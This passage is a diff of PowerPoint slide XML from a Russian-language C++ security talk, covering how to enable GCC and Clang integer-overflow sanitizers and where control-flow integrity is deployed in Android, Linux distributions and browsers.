-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>, а также в браузерах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android media stack:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Android Developers Blog: Hardening media stack</a:t>
-            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Android Developers Blog: Compiler-based security mitigations in Android P</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android user</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>- и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>kernelspace</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="sv-SE" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>System hardening in Android 11</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -36576,7 +36391,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5801BD-7B4E-4514-8AA3-A09D92C0889F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EDC4A3-65C4-4E94-A281-A0BE05178B80}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36603,7 +36418,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925941201"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607254691"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36635,7 +36450,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A565717-4BAA-4EF0-AE04-1234344C22C6}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E390CB5-FF6E-4765-B937-FC6BA0EF02FC}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36652,14 +36467,21 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CFI: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Целочисленные переполнения</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -36668,7 +36490,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5643B7A-2796-4C8D-BF20-1D8525E29A55}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAADEE4F-0571-446A-90C7-1E44732CD1C9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36682,146 +36504,275 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по дефолту на Android</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LLVM CFI </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не включена дефолтно для пакетов в Ubuntu, Debian, Fedora</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-trap=signed-integer-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>overflow,pointer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-overflow</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не поддерживает </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>integer</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ещё раз отметим что </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>ftrapv</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0"/>
+              <a:t>неработоспособна</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=signed-integer-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>overflow,pointer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-overflow -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-minimal-runtime</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендую также добавлять </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=integer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(может потребоваться добавить некоторые </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>хедеры в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>blacklist</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Защита не используется в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>, а также в браузерах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android media stack:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Android Developers Blog: Hardening media stack</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LTO + </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>отсутствие поддержки в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Intel CET и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>AArch64 CFI </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>дефолтно включён для пакетов в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Ubuntu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> и</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Debian</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LLVM CFI </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>X86 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>AArch64 CFI </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>ARM</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не использует никакой вариант </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CFI</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
+              <a:t>Android Developers Blog: Compiler-based security mitigations in Android P</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -36831,7 +36782,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C47595-0B65-4B0B-B52F-087D9E003C62}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5801BD-7B4E-4514-8AA3-A09D92C0889F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36858,7 +36809,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="498133543"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925941201"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36890,6 +36841,261 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A565717-4BAA-4EF0-AE04-1234344C22C6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CFI: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5643B7A-2796-4C8D-BF20-1D8525E29A55}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена по дефолту на Android</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не включена дефолтно для пакетов в Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LTO + </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>отсутствие поддержки в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Intel CET и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>дефолтно включён для пакетов в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Ubuntu</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Debian</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>X86 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ARM</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не использует никакой вариант </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CFI</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C47595-0B65-4B0B-B52F-087D9E003C62}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>95</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="498133543"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide96.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB30E6FA-DA1C-4347-B182-90992B279AE4}"/>
               </a:ext>
             </a:extLst>
@@ -37374,7 +37580,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>95</a:t>
+              <a:t>96</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -292,7 +292,7 @@
           <a:p>
             <a:fld id="{A8F27B54-EFD4-4F1F-9CE4-9A3C368187A4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -706,7 +706,7 @@
           <a:p>
             <a:fld id="{4E570717-CC08-42AC-84F3-7EB74EE2C2EE}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/21/2025</a:t>
+              <a:t>7/22/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -904,7 +904,7 @@
           <a:p>
             <a:fld id="{E850434B-ABC0-4013-A159-517880C2CE4B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
